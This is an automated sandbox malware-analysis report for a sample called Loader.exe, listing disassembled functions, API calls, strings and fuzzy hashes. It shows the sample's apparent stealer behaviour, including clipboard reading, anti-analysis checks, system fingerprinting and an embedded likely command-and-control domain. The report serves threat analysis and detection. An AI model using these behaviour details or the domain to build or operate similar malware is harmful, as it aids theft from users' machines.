Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
Instruction ID: 8163d3b21089687138d5515136ccc84ff93c8643e92a85db83e13d9e20d1854e
Opcode Fuzzy Hash: 7d09d88b6f266dff440f03eb9a5c9d7f94ee68ffd413995a3b71e903520ef18e
Instruction Fuzzy Hash: FA511572604206AFEF289F18C841BBAB7A4FF54710F58452DF905972A1E732EC98C7D2

Function 001B0546 Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

WriteConso.KERNEL32(00000000,00000000,?,00000000,00000000,?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000), ref: 001B055D
GetLastError.KERNEL32(?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA,016E13CA,?,001A60E2,00000000), ref: 001B0569

Part of subcall function 001B052F: CloseHandle.KERNEL32(FFFFFFFE,001B0579,?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA,016E13CA), ref: 001B053F

___initconout.LIBCMT ref: 001B0579

Part of subcall function 001B04F1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,001B0520,001AEF66,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA), ref: 001B0504

WriteConso.KERNEL32(00000000,00000000,?,00000000,?,001AEF79,00000000,00000001,00000000,016E13CA,?,001A5B5B,016E13CA,00000000,00000000,016E13CA), ref: 001B058E

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: ConsoWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 1327366883-0
Opcode ID: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
Instruction ID: e7dbcb7e6e1254848865f1ad5f568a65cb6a3c189e55c9a98c59b4ad5f245973
Opcode Fuzzy Hash: 25cf0224bfd10f44c6c44b3ea47f15847d31251e22572f2abf3f1e457e72b2b2
Instruction Fuzzy Hash: D3F0AC76500119BBCF232FA5EC089DA3F6AFF0D3A1B044610FA1996930C7328970DF90

Function 00192813 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 126COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 0019281A
_strlen.LIBCMT ref: 00192832

Strings

input string: , xrefs: 0019282D, 001928F8

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: H_prolog3_catch_strlen
String ID: input string:
API String ID: 3133806014-2984214493
Opcode ID: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
Instruction ID: 95747a5005a0d0288be9de1bb0249a4538e63c065633a2ac9f58d3308fca5cc0
Opcode Fuzzy Hash: ce736a5d45fc9bbde61dab91f933d139a14ff72c7c20b6ca41e1d06c9f1e810b
Instruction Fuzzy Hash: 88411670A44215AFCF20EF58D8D4DAC77F1BF58728F2A8259E429AB2E1C7709C41CB94

Function 00199C40 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 00199C7F
__IsNonwritableInCurrentImage.LIBCMT ref: 00199D33

Strings

csm, xrefs: 00199D1D

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
Instruction ID: 5ff0679b84b7712cce948c77d201eaa845fe1190656a0ee32eb025c30326cf5d
Opcode Fuzzy Hash: c62e1604d8aeb3944590d003579256170294df35c461bf69fb1c09d7cc55555e
Instruction Fuzzy Hash: 21418134A00218AFCF14DFACC884A9EBBF5BF45314F148159E8199B392D731AE55CB91

Function 0019A54D Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?), ref: 0019A572

Strings

RCC, xrefs: 0019A58C
MOC, xrefs: 0019A584

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
Instruction ID: 9bc3eb1ec6530c8dda50b9ee1cb7f3dd79aae598a6f2199f190a95a60c6d68aa
Opcode Fuzzy Hash: 5d45fe42a66fc1132cf195d186bcc5ec8fb0b6bf63c42121013c4d7a20d0354e
Instruction Fuzzy Hash: A3419971A00209AFCF15DF98CC81AEEBBB5FF48300F598099F904A7221D3359A50CF92

Function 00196865 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00197213
___raise_securityfailure.LIBCMT ref: 001972FB

Strings

xM!, xrefs: 001972F6

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xM!
API String ID: 3761405300-2887631340
Opcode ID: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
Instruction ID: 3dc9bd8c48975e12e356b62edee3a0191d65846b81f5899807626978f3b8ebbf
Opcode Fuzzy Hash: c3c2aa9df9b9ad288e4f91124ff7703c387ffec22738c4d8e4f7489606a0c916
Instruction Fuzzy Hash: F621C2B56102019AEB04EF65F94AB903BF8BB68715F11852AE50D8B3A1EBF19980CF45

Function 00197310 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0019731B
___raise_securityfailure.LIBCMT ref: 001973D8

Strings

xM!, xrefs: 001973D3

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: xM!
API String ID: 3761405300-2887631340
Opcode ID: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
Instruction ID: 781bc52f1a01f93856132eea2e42ac58a78b54b1f0192295adc12ebd4a25c895
Opcode Fuzzy Hash: 29fee64208dab47e0c24289df156984eaa6907fa4e529ae664466df7c39ce151
Instruction Fuzzy Hash: EF11A2B9511205DBDB00EF65F949AC03BB9BB68711F11D02AE90C8B3B1EBB09941DF85

Function 00191605 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0019160C
std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00191644

Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194DE3
Part of subcall function 00194DC4: _Yarn.LIBCPMT ref: 00194E07

Strings

bad locale name, xrefs: 00191652

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: Yarnstd::_$Locinfo::_Locinfo_ctorLockitLockit::_
String ID: bad locale name
API String ID: 1908188788-1405518554
Opcode ID: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
Instruction ID: d429224d767559da2c1457a5d8503cc03e3c1e9314cf89d1bbd2c5c8e094664d
Opcode Fuzzy Hash: cab3e5224df8b90195cf12c47e388e0b7e7bc2501b189160113119126ce69e3b
Instruction Fuzzy Hash: 90F030B1505B409E83359FBA8491447FBE4BE28310394CE2FE1DEC3A11D730E504CB6A

Function 001A3A31 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00215520), ref: 001A3A4E

Strings

U!, xrefs: 001A3A3D
pU!, xrefs: 001A3A5A

Memory Dump Source

Source File: 00000002.00000002.2143886749.0000000000191000.00000020.00000001.01000000.00000003.sdmp, Offset: 00190000, based on PE: true

Associated: 00000002.00000002.2143871186.0000000000190000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143908404.00000000001B3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143923943.00000000001BE000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2143960755.0000000000216000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_190000_Loader.jbxd

Similarity

API ID: FreeLibrary
String ID: U!$pU!
API String ID: 3664257935-37195876
Opcode ID: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
Instruction ID: 22101bdb92af8cee49fd8270dbffc0d4ad85ca31185bc87b003f0f11b39c4253
Opcode Fuzzy Hash: 7a48fe372dd9c281da6a2e04c139c52e21ba5bd96fd11267518a286657643b04
Instruction Fuzzy Hash: E5E04F3AC10564AADB301A18D404390B6D55B51335F55116AF4FD921E0A3711EE58680

Analysis Process: Loader.exePID: 5200, Parent PID: 7096COMMON

Execution Graph

Execution Coverage:	2.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	12%
Total number of Nodes:	83
Total number of Limit Nodes:	12

Executed Functions

Function 0043CC17 Relevance: 10.8, APIs: 7, Instructions: 259
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantInit.OLEAUT32(?), ref: 0043C898
SysStringLen.OLEAUT32(?), ref: 0043C97A
VariantClear.OLEAUT32(?), ref: 0043CB56
SysFreeString.OLEAUT32(?), ref: 0043CC31
SysFreeString.OLEAUT32(?), ref: 0043CC37
SysFreeString.OLEAUT32(?), ref: 0043CC48
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: String$Free$Variant$ClearInformationInitVolume
String ID:
API String ID: 171077572-0
Opcode ID: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
Instruction ID: f391356ba1e6a8e6107e64313ae411c35e8f889d22a0f8dca9c0fab8c944a7a2
Opcode Fuzzy Hash: 2cdfd943b68b243232979bf229ff110a1a12fc1fad690d09bae0bc54f57bced0
Instruction Fuzzy Hash: FD91DC7A208300DFD714CF24D895B6AB7E6FFC9311F19882DE585972A0EB78E905CB06

Function 0040CE60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 125
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

IsUserAnAdmin.SHELL32 ref: 0040CE71
GetInputState.USER32 ref: 0040CE84
GetCurrentThreadId.KERNEL32 ref: 0040CEC4
GetCurrentProcessId.KERNEL32 ref: 0040CECA
ExitProcess.KERNEL32 ref: 0040CFDD

Strings

SPQV, xrefs: 0040CF7E

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: CurrentProcess$AdminExitInputStateThreadUser
String ID: SPQV
API String ID: 2882748383-3051931956
Opcode ID: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
Instruction ID: b95e72557b87e2371c7c31153d7f42c66cf6c520f11fa7e329d023154aa7c17a
Opcode Fuzzy Hash: e56aa9daf5246d202b2c64d9be988e99a472127fa7ffee492877946f3a7061e5
Instruction Fuzzy Hash: B731C0205483418BE7006B39945936BABE2DF82314F149E7EE8C1E73D2CA7C884A875B

Function 004112A3 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 383
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004116C6

Strings

z, xrefs: 004117A7
12294815856B912D9A562334B477E717, xrefs: 004112A3
sergei-esenin.com, xrefs: 00411685

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: DirectorySystem
String ID: 12294815856B912D9A562334B477E717$sergei-esenin.com$z
API String ID: 2188284642-1348092731
Opcode ID: 92d048695fba465c126d9f9c742e20136716da17a6c2b0c8a8bb2ffbd6b60a50
Instruction ID: 345b3c13d49c59ed0b7ac164e6a763aa61c9bb11201d1002ab0abdaf27a0931a
Opcode Fuzzy Hash: 92d048695fba465c126d9f9c742e20136716da17a6c2b0c8a8bb2ffbd6b60a50
Instruction Fuzzy Hash: 96C120B550D3C08BE3319F2498917EBBBE2EF96304F08496ED8D98B391D73948058B87

Function 0043CCC5 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(?), ref: 0043CD30
SysAllocString.OLEAUT32(F3BFF1A3), ref: 0043CE15

Strings

s%u', xrefs: 0043CD92
!, xrefs: 0043CD9A

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID: !$s%u'
API String ID: 2525500382-439224852
Opcode ID: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
Instruction ID: 37b18a3e4ebf56d3d23ab1ff9e7973853f3fda15609219be389b3e4743c51eac
Opcode Fuzzy Hash: 2be98a605ab4fa336a6b2c318d79c7287d5e615792c9c667367571fb568a7bc0
Instruction Fuzzy Hash: CE4104B66993418FE314CF66D8C425BBBE3ABC5304F19996CE0949B345CBB8C50B8B52

Function 0043C754 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C6F0
CoCreateInstance.OLE32(00449CF0,00000000,00000001,00449CE0,00000000), ref: 0043C746

Strings

\, xrefs: 0043C700

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: CreateInstance
String ID: \
API String ID: 542301482-2967466578
Opcode ID: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
Instruction ID: 831dfc0ff0a5989b13bcf6da42eb41807a4eea7ad8a9b6a3e013ccaa1ef03f5d
Opcode Fuzzy Hash: c5e4514dbbed5f853774e9bd6e6f5144ba8530d52371be91707f697448a59d9b
Instruction Fuzzy Hash: 59F0BDB4188300EFF320CF10C88AB5BBBE4BB85715F108419F699592D0CBB99458CF9A

Function 00443090 Relevance: 1.5, APIs: 1, Instructions: 14libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL(004463BD,005C003F,00000006,?,?,00000018,?,?,?), ref: 004430BE

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82

Function 0043CB4D Relevance: 7.6, APIs: 5, Instructions: 109
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VariantClear.OLEAUT32(?), ref: 0043CB56
SysFreeString.OLEAUT32(?), ref: 0043CC31
SysFreeString.OLEAUT32(?), ref: 0043CC37
SysFreeString.OLEAUT32(?), ref: 0043CC48
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0043CC8C

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeString$ClearInformationVariantVolume
String ID:
API String ID: 1909038640-0
Opcode ID: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
Instruction ID: 71f6587865aeb7983240f0c874f145aba01153f807fa23e12df9d9708cfabf33
Opcode Fuzzy Hash: 6e28de4ba5478020d8d62bc26180408a0e151cd4c9bce5f6e352a1b502264b13
Instruction Fuzzy Hash: 7A31CA3A608340DFD7149F20EC99B5EB3A6EB89316F18483CE505872A1EB75E414CB15

Function 0043C75E Relevance: 1.6, APIs: 1, Instructions: 65
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(C30DC172), ref: 0043C7EE

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocString
String ID:
API String ID: 2525500382-0
Opcode ID: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
Instruction ID: 32f87fcb3125a501a8162f492a5ccfcff4981966fb883e090f713be905f41a06
Opcode Fuzzy Hash: db18a2924d06b779c85f447bad0e32e0505d9cde8ebe1f2047603a1bc77517cd
Instruction Fuzzy Hash: 02112C755883028FD314CF95C8C075ABBE1FBCA321F088A6CE4859B245D778D50ACFA1

Function 00440350 Relevance: 1.6, APIs: 1, Instructions: 57
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 004403CB

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
Instruction ID: 4a203bc74b8270b695fc07406262592e49ddfe5960292de94af20fe31efdee2e
Opcode Fuzzy Hash: 430a487729389f3d10e887d9154233dceb637cb42ec30677b57755ed99ff6f15
Instruction Fuzzy Hash: 03F0F6342893408FD709DB24ECB1B2A7BA9DB9A305F54457CD0C147292C27A982ADB92

Function 00443250 Relevance: 1.6, APIs: 1, Instructions: 53
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetForegroundWindow.USER32 ref: 004432BD

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
Instruction ID: 0a330300c86dc513bb90ae8d1cfff6d0cb8803b403817d65af22f579e6835f05
Opcode Fuzzy Hash: b08362b67b80bfc51f9b0781085942b41de1b7f4ec4a0f44df321009077aec9b
Instruction Fuzzy Hash: 98014936A042409BE719CF79D87567BB7D1AF15306B08846DD187C7392E738A609C709

Function 004402F7 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000), ref: 0044033F

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
Instruction ID: 802ee138748a9c1de57adb9ff5e7dd8bb977f0f805929440982499d5bfcd79cd
Opcode Fuzzy Hash: 2485c01211ce712cfbbd45a4efc2b111ae01a3d9bf3e5c06704cc5ec5e162443
Instruction Fuzzy Hash: 99F0EC39380724CFCB168AA2F840555B721EBC663A71881FAD9315BAE2C2790817CB90

Function 004432AF Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 004432BD

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
Instruction ID: 730dbf267ab9c65472c63067bb6e41d1d4c7e74c9f538b4d6545cc4e430076e3
Opcode Fuzzy Hash: 8706f1abee52da8bff56e989da8888f74a9f68174d20dcfd9d535ed2545853d7
Instruction Fuzzy Hash: 3CE0867E5003009FC700DF54EC9146937A0E7073063050439E143D33A2D734A544CB1A

Function 00411281 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411293

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
Instruction ID: 1bf7a1bd5185e41d29c4a2cbb7d1407be12a0acaffe88bf902526c463dcd8eef
Opcode Fuzzy Hash: 4c2b1588ea85639d6cb6d05cbbdf0db7d68b21365f39083882640298d32fd0a2
Instruction Fuzzy Hash: ACD092343D8300B6F2710B08BC17F043120A303F22F700320B3207C1E189E07110961E

Function 0043C821 Relevance: 1.5, APIs: 1, Instructions: 12COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0043C833

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
Instruction ID: 654b4b1d450e911c26586d927dca2102275bdb567952844bef8e5804c0f87415
Opcode Fuzzy Hash: ff6f4091f85bc74b46a1bdf2edf96c5b09c9cbc6c8c7167365f80d7df66e59cf
Instruction Fuzzy Hash: BAD048383C4308BAF3324B14FC1BF083664B792F03F201420B781BC0E18AF1A2609A1E

Function 00411260 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00411271

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
Instruction ID: 3969f46c452db3cda2ce3cdd2237f3c33a7c6bfde3ae9b63386c6deee56049b4
Opcode Fuzzy Hash: 57e0faa4300627c3268436e8894b121cac013d14c93084444cf44528358cced8
Instruction Fuzzy Hash: F9C08C30024208A7F220272DAC0BF43392CE303721F000330F9A0400D2AA106420C5BB

Non-executed Functions

Function 00436F40 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 113clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00436F54
GetWindowLongW.USER32 ref: 00436F79
GetClipboardData.USER32 ref: 00436F89
GlobalLock.KERNEL32 ref: 00436FAA
GlobalUnlock.KERNEL32 ref: 0043709B
CloseClipboard.USER32 ref: 004370A4

Strings

+, xrefs: 00436FF7
&, xrefs: 00437006
', xrefs: 00436FD9
), xrefs: 00436FE3
%, xrefs: 00436FDE
9, xrefs: 0043700B
., xrefs: 00436FED
$, xrefs: 00437010

Memory Dump Source

Source File: 00000003.00000002.2304137041.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_Loader.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID: $$%$&$'$)$+$.$9
API String ID: 2832541153-3297824023
